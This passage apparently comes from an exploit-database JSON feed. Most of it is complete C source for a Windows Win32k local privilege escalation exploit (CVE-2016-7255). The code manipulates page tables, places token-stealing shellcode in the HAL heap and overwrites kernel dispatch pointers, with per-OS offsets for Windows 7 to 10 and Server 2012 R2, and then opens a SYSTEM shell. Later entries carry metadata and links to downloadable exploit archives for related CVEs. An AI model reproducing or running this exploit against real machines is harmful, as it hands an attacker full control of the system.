RBX\n\n\t0x5b, // POP RBX\n\t0x59, // POP RCX\n\t0x58, // POP RAX\n\t0x9d, // POPFQ\n\n\t0xfb, // STI\n\t0xff, 0xe0 // JMP RAX\n};\n\nULONG __cdecl DbgPrint(__in char* Format, ...)\n{\n\tCHAR* pszDbgBuff = NULL;\n\tva_list VaList = NULL;\n\tULONG ulRet = 0;\n\n\tdo\n\t{\n\t\tpszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0, 1024 * sizeof(CHAR));\n\t\tif (NULL == pszDbgBuff)\n\t\t{\n\t\t\tbreak;\n\t\t}\n\t\tRtlZeroMemory(pszDbgBuff, 1024 * sizeof(CHAR));\n\n\t\tva_start(VaList, Format);\n\n\t\t_vsnprintf((CHAR*)pszDbgBuff, 1024 - 1, Format, VaList);\n\n\n\t\tOutputDebugStringA(pszDbgBuff);\n\n\t\tva_end(VaList);\n\n\t} while (FALSE);\n\n\tif (NULL != pszDbgBuff)\n\t{\n\t\tHeapFree(GetProcessHeap(), 0, pszDbgBuff);\n\t\tpszDbgBuff = NULL;\n\t}\n\n\treturn ulRet;\n}\n\n\nint _sim_key_down(WORD wKey)\n{\n\tINPUT stInput = { 0 };\n\n\tdo\n\t{\n\t\tstInput.type = INPUT_KEYBOARD;\n\t\tstInput.ki.wVk = wKey;\n\t\tstInput.ki.dwFlags = 0;\n\n\t\tSendInput(1, &stInput, sizeof(stInput));\n\n\t} while (FALSE);\n\n\treturn 0;\n}\n\nint _sim_key_up(WORD wKey)\n{\n\tINPUT stInput = { 0 };\n\n\tdo\n\t{\n\t\tstInput.type = INPUT_KEYBOARD;\n\t\tstInput.ki.wVk = wKey;\n\t\tstInput.ki.dwFlags = KEYEVENTF_KEYUP;\n\n\t\tSendInput(1, &stInput, sizeof(stInput));\n\n\t} while (FALSE);\n\n\treturn 0;\n}\n\nint _sim_alt_shift_esc()\n{\n\tint i = 0;\n\n\tdo\n\t{\n\t\t_sim_key_down(VK_MENU);\n\t\t_sim_key_down(VK_SHIFT);\n\n\n\t\t_sim_key_down(VK_ESCAPE);\n\t\t_sim_key_up(VK_ESCAPE);\n\n\t\t_sim_key_down(VK_ESCAPE);\n\t\t_sim_key_up(VK_ESCAPE);\n\n\t\t_sim_key_up(VK_MENU);\n\t\t_sim_key_up(VK_SHIFT);\n\n\n\t} while (FALSE);\n\n\treturn 0;\n}\n\n\n\nint _sim_alt_shift_tab(int nCount)\n{\n\tint i = 0;\n\tHWND hWnd = NULL;\n\n\n\tint nFinalRet = -1;\n\n\tdo\n\t{\n\t\t_sim_key_down(VK_MENU);\n\t\t_sim_key_down(VK_SHIFT);\n\n\n\t\tfor (i = 0; i < nCount; 
i++)\n\t\t{\n\t\t\t_sim_key_down(VK_TAB);\n\t\t\t_sim_key_up(VK_TAB);\n\n\t\t\tSleep(1000);\n\n\t\t}\n\n\n\t\t_sim_key_up(VK_MENU);\n\t\t_sim_key_up(VK_SHIFT);\n\t} while (FALSE);\n\n\treturn nFinalRet;\n}\n\nint _sim_alt_esc(int count)\n{\n\tint i = 0;\n\n\tfor (i = 0; i<count; i++)\n\t{\n\t\t_sim_key_down(VK_MENU);\n\t\t//_sim_key_down(VK_SHIFT);\n\n\n\t\t_sim_key_down(VK_ESCAPE);\n\t\t_sim_key_up(VK_ESCAPE);\n\n\t\t_sim_key_down(VK_ESCAPE);\n\t\t_sim_key_up(VK_ESCAPE);\n\n\t\t_sim_key_up(VK_MENU);\n\t\t//_sim_key_up(VK_SHIFT);\n\n\t}\n\n\treturn 0;\n}\n\n\nint or_address_value_4(__in void* pAddress)\n{\n\tWNDCLASSEXW stWC = { 0 };\n\n\tHWND hWndParent = NULL;\n\tHWND hWndChild = NULL;\n\n\tWCHAR* pszClassName = L\"cve-2016-7255\";\n\tWCHAR* pszTitleName = L\"cve-2016-7255\";\n\n\tvoid* pId = NULL;\n\tMSG stMsg = { 0 };\n\n\tUINT64 value = 0;\n\n\tdo\n\t{\n\n\t\tstWC.cbSize = sizeof(stWC);\n\t\tstWC.lpfnWndProc = DefWindowProcW;\n\t\tstWC.lpszClassName = pszClassName;\n\n\t\tif (0 == RegisterClassExW(&stWC))\n\t\t{\n\t\t\tbreak;\n\t\t}\n\n\t\thWndParent = CreateWindowExW(\n\t\t\t0,\n\t\t\tpszClassName,\n\t\t\tNULL,\n\t\t\tWS_OVERLAPPEDWINDOW | WS_VISIBLE,\n\t\t\t0,\n\t\t\t0,\n\t\t\t360,\n\t\t\t360,\n\t\t\tNULL,\n\t\t\tNULL,\n\t\t\tGetModuleHandleW(NULL),\n\t\t\tNULL\n\t\t);\n\n\t\tif (NULL == hWndParent)\n\t\t{\n\t\t\tbreak;\n\t\t}\n\n\t\thWndChild = CreateWindowExW(\n\t\t\t0,\n\t\t\tpszClassName,\n\t\t\tpszTitleName,\n\t\t\tWS_OVERLAPPEDWINDOW | WS_VISIBLE | WS_CHILD,\n\t\t\t0,\n\t\t\t0,\n\t\t\t160,\n\t\t\t160,\n\t\t\thWndParent,\n\t\t\tNULL,\n\t\t\tGetModuleHandleW(NULL),\n\t\t\tNULL\n\t\t);\n\n\t\tif (NULL == hWndChild)\n\t\t{\n\t\t\tbreak;\n\t\t}\n\n#ifdef _WIN64\n\t\tpId = ((UCHAR*)pAddress - 0x28);\n#else\n\t\tpId = ((UCHAR*)pAddress - 0x14);\n#endif // #ifdef _WIN64\n\n\t\tSetWindowLongPtr(hWndChild, GWLP_ID, (LONG_PTR)pId);\n\n\t\tDbgPrint(\"hWndChild = 0x%p\\n\", hWndChild);\n\n\t\tShowWindow(hWndParent, SW_SHOWNORMAL);\n\n\t\tSetParent(hWndChild, 
GetDesktopWindow());\n\n\t\tSetForegroundWindow(hWndChild);\n\n\t\t_sim_alt_shift_tab(4);\n\n\t\tSwitchToThisWindow(hWndChild, TRUE);\n\n\t\t_sim_alt_shift_esc();\n\n\t\twhile (GetMessage(&stMsg, NULL, 0, 0)) {\n\t\t\t\n\t\t\tSetFocus(hWndParent);\n\t\t\t_sim_alt_esc(20);\n\t\t\tSetFocus(hWndChild);\n\t\t\t_sim_alt_esc(20);\n\n\t\t\tTranslateMessage(&stMsg);\n\t\t\tDispatchMessage(&stMsg);\n\t\t\t\n\t\t\tif (value != 0) {\n\t\t\t\tbreak;\n\t\t\t}\n\t\t\t\n\n\t\t\t__try {\n\t\t\t\tvalue = *(UINT64 *)PML4_SELF_REF;\n\t\t\t\tif ((value & 0x67) == 0x67) {\n\t\t\t\t\tprintf(\"Value Self Ref = %llx\\n\", value);\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t}\n\t\t\t__except (EXCEPTION_EXECUTE_HANDLER) {\n\t\t\t\tcontinue;\n\t\t\t}\n\n\t\t}\n\n\n\t} while (FALSE);\n\n\tif (NULL != hWndParent)\n\t{\n\t\tDestroyWindow(hWndParent);\n\t\thWndParent = NULL;\n\t}\n\n\tif (NULL != hWndChild)\n\t{\n\t\tDestroyWindow(hWndChild);\n\t\thWndChild = NULL;\n\t}\n\n\tUnregisterClassW(pszClassName, GetModuleHandleW(NULL));\n\n\treturn 0;\n}\n\nUINT64 get_pxe_address(UINT64 address) {\n\tUINT entry = PML4_SELF_REF_INDEX;\n\tUINT64 result = address >> 9;\n\tUINT64 lower_boundary = ((UINT64)0xFFFF << 48) | ((UINT64)entry << 39);\n\tUINT64 upper_boundary = (((UINT64)0xFFFF << 48) | ((UINT64)entry << 39) + 0x8000000000 - 1) & 0xFFFFFFFFFFFFFFF8;\n\tresult = result | lower_boundary;\n\tresult = result & upper_boundary;\n\treturn result;\n}\n\nUINT64 look_free_entry_pml4(void) {\n\t// Looks for a free pml4e in the last 0x100 bytes of the PML4\n\tint offset = 0xF00;\n\tUINT64 pml4_search = PML4_BASE + offset;\n\twhile (offset < 0xFF8)\n\t{\n\t\tif ((*(PVOID *)pml4_search) == 0x0)\n\t\t{\n\t\t\t// This is a NULL (free) entry\n\t\t\tbreak;\n\t\t}\n\t\toffset += 8;\n\t\tpml4_search = PML4_BASE + offset;\n\t}\n\treturn pml4_search;\n}\n\nUINT64 calculate_spurious_pt_address(UINT64 spurious_offset) {\n\tUINT64 index = (spurious_offset & 0xFFF) / 8;\n\tUINT64 result = (\n\t\t((UINT64)0xFFFF << 48) 
|\n\t\t((UINT64)PML4_SELF_REF_INDEX << 39) |\n\t\t((UINT64)PML4_SELF_REF_INDEX << 30) |\n\t\t((UINT64)PML4_SELF_REF_INDEX << 21) |\n\t\t(index << 12)\n\t\t);\n\treturn result;\n}\n\n\n\nUINT64 create_spurious_pte_to_virtual_address(UINT64 virtual_address, BOOL patch_original) {\n\n\t/*\n\t1: kd> !pte ffffffff`ffd00000\n\tVA ffffffffffd00000\n\tPXE at FFFFF6FB7DBEDFF8 PPE at FFFFF6FB7DBFFFF8 PDE at FFFFF6FB7FFFFFF0 PTE at FFFFF6FFFFFFE800\n\tcontains 0000000000A1F063 contains 0000000000A20063 contains 0000000000A25063 contains 8000000000103963\n\tpfn a1f-- - DA--KWEV pfn a20-- - DA--KWEV pfn a25-- - DA--KWEV pfn 103 - G - DA--KW - V\n\t*/\t\n\n\tUINT64 pte = get_pxe_address(virtual_address);\n\tint pte_offset = pte & 0xFFF;\n\t//printf(\"PTE: %llx, %x\\n\", pte, pte_offset);\n\t\n\tUINT64 pde = get_pxe_address(pte);\n\tint pde_offset = pde & 0xFFF;\n\t//printf(\"PDE: %llx, %x\\n\", pde, pde_offset);\n\t\t\n\tUINT64 pdpte = get_pxe_address(pde);\n\tint pdpte_offset = pdpte & 0xFFF;\n\t//printf(\"PDPTE: %llx,%x\\n\", pdpte, pdpte_offset);\n\t\t\n\tUINT64 pml4e = get_pxe_address(pdpte);\n\tint pml4e_offset = pml4e & 0xFFF;\n\t//printf(\"PML4E: %llx\\n\", pml4e, pml4e_offset);\n\t\n\tUINT64 spurious_offset = look_free_entry_pml4();\n\tprintf(\"[+] Selected spurious PML4E: %llx\\n\", spurious_offset);\n\tUINT64 f_e_pml4 = spurious_offset;\n\tUINT64 spurious_pt = calculate_spurious_pt_address(spurious_offset);\n\tprintf(\"[+] Spurious PT: %llx\\n\", spurious_pt);\n\tprintf(\"--------------------------------------------------\\n\\n\");\n\t\n\t\n\t//Read the physical address of pml4e\t\n\tUINT64 pml4e_pfn = (UINT64)(*(PVOID *)pml4e);\n\tprintf(\"[+] Content pml4e %llx: %llx\\n\", pml4e, pml4e_pfn);\n\t// Change the PxE\n\tpml4e_pfn = pml4e_pfn | 0x67; // Set U/S\n\t\n\tprintf(\"[+] Patching the Spurious Offset (PML4e) %llx: %llx\\n\",f_e_pml4, pml4e_pfn);\n\t*((PVOID *)spurious_offset) = (PVOID)pml4e_pfn;\n\tSleep(0x1); // Sleep for TLB refresh;\n\t\n\t//Read the physical 
address of pdpte\n\tUINT64 pdpte_pfn = (UINT64) *(PVOID *)(spurious_pt + pdpte_offset);\n\tprintf(\"[+] Content pdpte %llx: %llx\\n\", pdpte, pdpte_pfn);\n\t// Change the PxE\n\tpdpte_pfn = pdpte_pfn | 0x67; // Set U/S\n\tprintf(\"[+] Patching the Spurious Offset (PDPTE) %llx: %llx\\n\", spurious_offset, pdpte_pfn);\n\t*((PVOID *)spurious_offset) = (PVOID)pdpte_pfn;\n\tSleep(0x1); // Sleep for TLB refresh;\n\t\n\t//Read the physical address of pde\n\tUINT64 pde_addr = spurious_pt + pde_offset;\n\tUINT64 pde_pfn = (UINT64) *(PVOID *)(spurious_pt + pde_offset);\n\tprintf(\"[+] Content pdpe %llx: %llx\\n\", pde, pde_pfn);\n\t// Change the PxE\n\tpde_pfn = pde_pfn | 0x67; // Set U/S\n\tprintf(\"[+] Patching the Spurious Offset (PDE) %llx: %llx\\n\", spurious_offset, pde_pfn);\n\t*((PVOID *)spurious_offset) = (PVOID)pde_pfn;\n\tSleep(0x1); // Sleep for TLB refresh;\n\t\n\t//Read the physical address of pte\n\tUINT64 pte_addr = spurious_pt + pte_offset;\n\tUINT64 pte_pfn = (UINT64) *(PVOID *)(spurious_pt + pte_offset);\n\tprintf(\"[+] Content pte %llx: %llx\\n\", pte, pte_pfn);\n\t// Change the PxE\n\tpte_pfn = pte_pfn | 0x67; // Set U/S\n pte_pfn = pte_pfn & 0x7fffffffffffffff; // Turn off NX \n\tif (patch_original) {\n\t\tprintf(\"*** Patching the original location to enable NX...\\n\");\n\t\t*(PVOID *)(spurious_pt + pte_offset) = (PVOID)pte_pfn;\n\t}\n \n\tprintf(\"[+] Patching the Spurious Offset (PTE) %llx: %llx\\n\", spurious_offset, pte_pfn);\n\t*((PVOID *)spurious_offset) = (PVOID)pte_pfn;\n\tSleep(0x1); // Sleep for TLB refresh;\n\tprintf(\"\\n\\n\");\n\treturn spurious_pt;\n}\n\nUINT64 get_OverwriteAddress_pointer(UINT64 target_address, int target_offset) {\n\tprintf(\"[*] Getting Overwrite pointer: %llx\\n\", target_address);\n\tUINT64 OverwriteAddress = create_spurious_pte_to_virtual_address(target_address, FALSE);\n\tOverwriteAddress += (target_address & 0xFFF);\n\tprintf(\"OverwriteAddress: %llx\\n\", OverwriteAddress);\n\treturn (UINT64) *((PVOID *)(((char 
*)OverwriteAddress) + target_offset));\n}\n\nvoid overwrite_TargetAddress(UINT64 hook_address, UINT64 target_address, int target_offset) {\n\tUINT64 OverwriteTarget = create_spurious_pte_to_virtual_address(target_address, FALSE);\n\tOverwriteTarget += (target_address & 0xFFF);\n\tUINT64 target = (UINT64)((char *)OverwriteTarget) + target_offset;\n\tprintf(\"Patch OverwriteTarget: %llx with %llx\\n\", target, hook_address);\n\t*(PVOID *)target = (PVOID)hook_address;\n}\n\n\nUINT64 store_shellcode_in_hal(void) {\n\t//// Finally store the shellcode on the HAL\n\n\tUINT64 hal_heap_addr = 0xFFFFFFFFFFD00000;\n\tUINT64 hal_heap = create_spurious_pte_to_virtual_address(hal_heap_addr, TRUE);\n\n\tprintf(\"HAL address: %llx\\n\", hal_heap);\n\t// 0xffffffffffd00d50 this is a good offset to store shellcode \n\t// 0xfff - 0xd50 = 0x2af space\n\n\tmemcpy(((char *)hal_heap) + 0xd50, shellcode, sizeof(shellcode));\n\treturn 0xffffffffffd00d50;\n}\n\nUINT64 GetHalDispatchTable() {\n PCHAR KernelImage;\n SIZE_T ReturnLength;\n HMODULE hNtDll = NULL;\n UINT64 HalDispatchTable;\n HMODULE hKernelInUserMode = NULL;\n PVOID KernelBaseAddressInKernelMode;\n NTSTATUS NtStatus = STATUS_UNSUCCESSFUL;\n PSYSTEM_MODULE_INFORMATION pSystemModuleInformation;\n\n hNtDll = LoadLibrary(\"ntdll.dll\");\n\n if (!hNtDll) {\n printf(\"\\t\\t\\t[-] Failed To Load NtDll.dll: 0x%X\\n\", GetLastError());\n exit(EXIT_FAILURE);\n }\n\n NtQuerySystemInformation = (NtQuerySystemInformation_t)GetProcAddress(hNtDll, \"NtQuerySystemInformation\");\n\n if (!NtQuerySystemInformation) {\n printf(\"\\t\\t\\t[-] Failed Resolving NtQuerySystemInformation: 0x%X\\n\", GetLastError());\n exit(EXIT_FAILURE);\n }\n\n NtStatus = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &ReturnLength);\n\n // Allocate the Heap chunk\n pSystemModuleInformation = (PSYSTEM_MODULE_INFORMATION)HeapAlloc(GetProcessHeap(),\n HEAP_ZERO_MEMORY,\n ReturnLength);\n\n if (!pSystemModuleInformation) {\n printf(\"\\t\\t\\t[-] Memory 
Allocation Failed For SYSTEM_MODULE_INFORMATION: 0x%X\\n\", GetLastError());\n exit(EXIT_FAILURE);\n }\n NtStatus = NtQuerySystemInformation(SystemModuleInformation,\n pSystemModuleInformation,\n ReturnLength,\n &ReturnLength);\n\n if (NtStatus != STATUS_SUCCESS) {\n printf(\"\\t\\t\\t[-] Failed To Get SYSTEM_MODULE_INFORMATION: 0x%X\\n\", GetLastError());\n exit(EXIT_FAILURE);\n }\n\n KernelBaseAddressInKernelMode = pSystemModuleInformation->Module[0].Base;\n KernelImage = strrchr((PCHAR)(pSystemModuleInformation->Module[0].ImageName), '\\\\') + 1;\n\n printf(\"\\t\\t\\t[+] Loaded Kernel: %s\\n\", KernelImage);\n printf(\"\\t\\t\\t[+] Kernel Base Address: 0x%p\\n\", KernelBaseAddressInKernelMode);\n \n hKernelInUserMode = LoadLibraryA(KernelImage);\n\n if (!hKernelInUserMode) {\n printf(\"\\t\\t\\t[-] Failed To Load Kernel: 0x%X\\n\", GetLastError());\n exit(EXIT_FAILURE);\n }\n\n // This is still in user mode\n HalDispatchTable = (UINT64)GetProcAddress(hKernelInUserMode, \"HalDispatchTable\");\n\n if (!HalDispatchTable) {\n printf(\"\\t\\t\\t[-] Failed Resolving HalDispatchTable: 0x%X\\n\", GetLastError());\n exit(EXIT_FAILURE);\n }\n else {\n HalDispatchTable = (ULONGLONG)HalDispatchTable - (ULONGLONG)hKernelInUserMode;\n\n // Here we get the address of HapDispatchTable in Kernel mode\n HalDispatchTable = ((ULONGLONG)HalDispatchTable + (ULONGLONG)KernelBaseAddressInKernelMode);\n printf(\"\\t\\t\\t[+] HalDispatchTable: 0x%llx\\n\", HalDispatchTable);\n }\n\n HeapFree(GetProcessHeap(), 0, (LPVOID)pSystemModuleInformation);\n\n if (hNtDll) {\n FreeLibrary(hNtDll);\n }\n\n if (hKernelInUserMode) {\n FreeLibrary(hKernelInUserMode);\n }\n\n hNtDll = NULL;\n hKernelInUserMode = NULL;\n pSystemModuleInformation = NULL;\n\n return HalDispatchTable;\n}\n\nint __cdecl main(int argc, char** argv)\n{\n\tTCHAR pre_username[256];\n\tTCHAR post_username[256];\n\tDWORD size = 256;\n\tULONG Interval = 0;\n\tHMODULE hNtDll = NULL;\n\tUINT retval;\n UINT64 overwrite_address;\n int 
overwrite_offset;\n \n // define operating system version specific variables\n unsigned char sc_KPROCESS;\n unsigned int sc_TOKEN;\n unsigned int sc_APLINKS;\n\tint osversion;\n\n\tif (argc != 2) {\n\t\tprintf(\"Please enter an OS version\\n\");\n\t\tprintf(\"The following OS'es are supported:\\n\");\n\t\tprintf(\"\\t[*] 7 - Windows 7\\n\");\n\t\tprintf(\"\\t[*] 81 - Windows 8.1\\n\");\n\t\tprintf(\"\\t[*] 10 - Windows 10 prior to build release 14393 (Anniversary Update)\\n\");\n\t\tprintf(\"\\t[*] 12 - Windows 2012 R2\\n\");\n\t\tprintf(\"\\n\");\n\t\tprintf(\"\\t[*] For example: cve-2016-7255.exe 7 -- for Windows 7\\n\");\n\t\treturn -1;\n\t}\n\t\n\tosversion = _strtoui64(argv[1], NULL, 10);\n\t\n if(osversion == 7) \n {\n // the target machine's OS is Windows 7 SP1\n printf(\" [+] Windows 7 SP1\\n\");\n sc_KPROCESS = 0x70;\t\t\t// dt -r1 nt!_KTHREAD +0x050 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS\n sc_TOKEN = 0x80;\t\t\t// dt -r1 nt!_EPROCESS [+0x208 Token : _EX_FAST_REF] - [+0x188 ActiveProcessLinks : _LIST_ENTRY] = (0x80)\n sc_APLINKS = 0x188;\t\t// dt -r1 nt!_EPROCESS +0x188 ActiveProcessLinks : _LIST_ENTRY\n \n overwrite_address = GetHalDispatchTable(); // HalDispatchTable\n overwrite_offset = 0x8; \t\t\t\t// QueryIntervalProfile \n }\n\telse if(osversion == 81)\n {\n // the target machine's OS is Windows 8.1\n printf(\" [+] Windows 8.1\\n\");\n sc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS\n sc_TOKEN = 0x60; // dt -r1 nt!_EPROCESS [+0x348 Token : _EX_FAST_REF] - [+0x2e8 ActiveProcessLinks : _LIST_ENTRY] = (0x60)\n sc_APLINKS = 0x2e8; \t// dt -r1 nt!_EPROCESS +0x2e8 ActiveProcessLinks : _LIST_ENTRY\n \n overwrite_address = 0xffffffffffd00510; // HalpInterruptController_address (dq poi(hal!HalpInterruptController))\n overwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt)\n }\n\telse if(osversion == 10)\n {\n // the target machine's OS is Windows 
10 prior to build 14393\n printf(\" [+] Windows 10\\n\");\n sc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS\n sc_TOKEN = 0x68; // dt -r1 nt!_EPROCESS [+0x358 Token : _EX_FAST_REF] - [+0x2f0 ActiveProcessLinks : _LIST_ENTRY] = (0x60)\n sc_APLINKS = 0x2f0; // dt -r1 nt!_EPROCESS +0x2f0 ActiveProcessLinks : _LIST_ENTRY\n \n overwrite_address = 0xffffffffffd004c0; // HalpInterruptController_address (dq poi(hal!HalpInterruptController)\n overwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt)\n }\n\telse if(osversion == 12)\n {\n // the target machine's OS is Windows 2012 R2\n printf(\" [+] Windows 2012 R2\\n\");\n sc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS\n sc_TOKEN = 0x60; // dt -r1 nt!_EPROCESS [+0x348 Token : _EX_FAST_REF] - [+0x2e8 ActiveProcessLinks : _LIST_ENTRY] = (0x60)\n sc_APLINKS = 0x2e8; // dt -r1 nt!_EPROCESS +0x2e8 ActiveProcessLinks : _LIST_ENTRY\n \n overwrite_address = 0xffffffffffd12c70; // HalpInterruptController_address (dq poi(hal!HalpInterruptController)\n overwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt)\n }\n // in case the OS version is not any of the previously checked versions\n else\n {\n printf(\" [-] Unsupported version\\n\");\n printf(\" [*] Affected 64-bit operating systems\\n\");\n printf(\" [*] Windows 7 SP1 -- cve-2016-7255.exe 7\\n\");\n\t\tprintf(\" [*] Windows 8.1 -- cve-2016-7255.exe 81\\n\");\n\t\tprintf(\" [*] Windows 10 before build 14393 -- cve-2016-7255.exe 10\\n\");\n\t\tprintf(\"\t\t [*] Windows 2012 R2\t\t\t -- cve-2016-7255.exe 12\\n\");\n return -1;\n }\n \n\tprintf(\"My PID is: %d\\n\", GetCurrentProcessId());\n GetUserName(pre_username, &size);\n\tprintf(\"Current Username: %s\\n\", pre_username);\n\tprintf(\"PML4 Self Ref: %llx\\n\", PML4_SELF_REF);\n printf(\"Shellcode stored at: %p\\n\", (void *) 
&shellcode);\n\tprintf(\"Enter to continue...\\n\");\n\tgetchar();\n\n\tdo\n\t{\n\t\tor_address_value_4((void*)PML4_SELF_REF);\n\t} while (FALSE);\n\n\tPML4_SELF_REF_INDEX = GET_INDEX((UINT64)PML4_SELF_REF);\n\tprintf(\"[*] Self Ref Index: %x\\n\", PML4_SELF_REF_INDEX);\n\tPML4_BASE = ((UINT64)PML4_SELF_REF & (UINT64)0xFFFFFFFFFFFFF000);\n\t\n UINT64 original_pointer = get_OverwriteAddress_pointer(overwrite_address, overwrite_offset);\n\n\tprintf(\"Original OverwriteTarget pointer: %llx\\n\", original_pointer);\n\tDWORD pid = GetCurrentProcessId();\n \n /* Shellcode Patching !! */\n\tchar *p = shellcode;\n\tp += 4; // skip the CLI, PUSHF and MOV RAX bytes\t\n\t*(PVOID *)p = (PVOID)original_pointer; // Patch shellcode1\n\n\tp += 12; // Patch shellcode with original value in the Overwrite address\n\t*(PVOID *)p = (PVOID)(overwrite_address + overwrite_offset);\n\n\tp += 12; // To patch the PID of our process\n\t\n\t*(DWORD *)p = (DWORD)pid;\n \n p += 17;\n *(unsigned char *)p = (unsigned char)sc_KPROCESS;\n \n p += 7;\n *(unsigned int *)p = (unsigned int)sc_APLINKS;\n \n p += 20;\n *(unsigned int *)p = (unsigned int)sc_TOKEN;\n \n p += 20;\n *(unsigned int *)p = (unsigned int)sc_TOKEN;\n \n UINT64 shellcode_va = store_shellcode_in_hal();\n\tprintf(\"[+] w00t: Shellcode stored at: %llx\\n\", shellcode_va);\n\toverwrite_TargetAddress(shellcode_va, overwrite_address, overwrite_offset);\n\t\n\tif (osversion == 7){\n\t\t// Exploit Win7.1\n\t\thNtDll = LoadLibrary(\"ntdll.dll\");\n\n\t\tif (!hNtDll) {\n\t\t\tprintf(\"\\t\\t[-] Failed loading NtDll: 0x%X\\n\", GetLastError());\n\t\t\texit(EXIT_FAILURE);\n\t\t}\n\t\n\t\tNtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(hNtDll, \"NtQueryIntervalProfile\");\n\n\t\tif (!NtQueryIntervalProfile) {\n\t\t\tprintf(\"\\t\\t[-] Failed Resolving NtQueryIntervalProfile: 0x%X\\n\", GetLastError());\n\t\t\texit(EXIT_FAILURE);\n\t\t}\t\n\t\tNtQueryIntervalProfile(0x1337, &Interval);\n\t}\n\n\t\n\twhile (1) {\n\t\tsize = 
256;\n\t\tGetUserName(post_username, &size);\n\t\tif (memcmp(post_username, pre_username, 256) != 0) break;\n\t}\n\tSleep(2000);\n\tsystem(\"cmd.exe\");\n\n\n\treturn 0;\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:33", "description": "\nMicrosoft Windows - Win32k Local Privilege Escalation", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-05-15T00:00:00", "title": "Microsoft Windows - Win32k Local Privilege Escalation", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0803", "CVE-2016-7255"], "modified": "2019-05-15T00:00:00", "id": "EXPLOITPACK:1395F02807B421A9A8880862CED5BAB3", "href": "", "sourceData": "# CVE-2019-0803\nWin32k Elevation of Privilege Poc\n\nReference\n-----------------------------\n(steal Security token) https://github.com/mwrlabs/CVE-2016-7255\n\n\nEDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46920.zip", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:33", "description": "\nMicrosoft Windows Kernel 
- win32k Denial of Service (MS16-135)", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-11-09T00:00:00", "title": "Microsoft Windows Kernel - win32k Denial of Service (MS16-135)", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0075", "CVE-2016-7255"], "modified": "2016-11-09T00:00:00", "id": "EXPLOITPACK:3FDA4C818CF6EA61DD6359696752E123", "href": "", "sourceData": "/*\nSource: https://github.com/tinysec/public/tree/master/CVE-2016-7255\n\nFull Proof of Concept:\n\nhttps://github.com/tinysec/public/tree/master/CVE-2016-7255\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40745.zip\n\n********************************************************************\n Created:\t2016-11-09 14:23:09\n Filename: \tmain.c\n Author:\troot[at]TinySec.net\n Version\t0.0.0.1\n Purpose:\tpoc of cve-2016-0075\n*********************************************************************\n*/\n\n#include <windows.h>\n#include <wchar.h>\n#include <stdlib.h>\n#include <stdio.h>\n\n\n//////////////////////////////////////////////////////////////////////////\n#pragma 
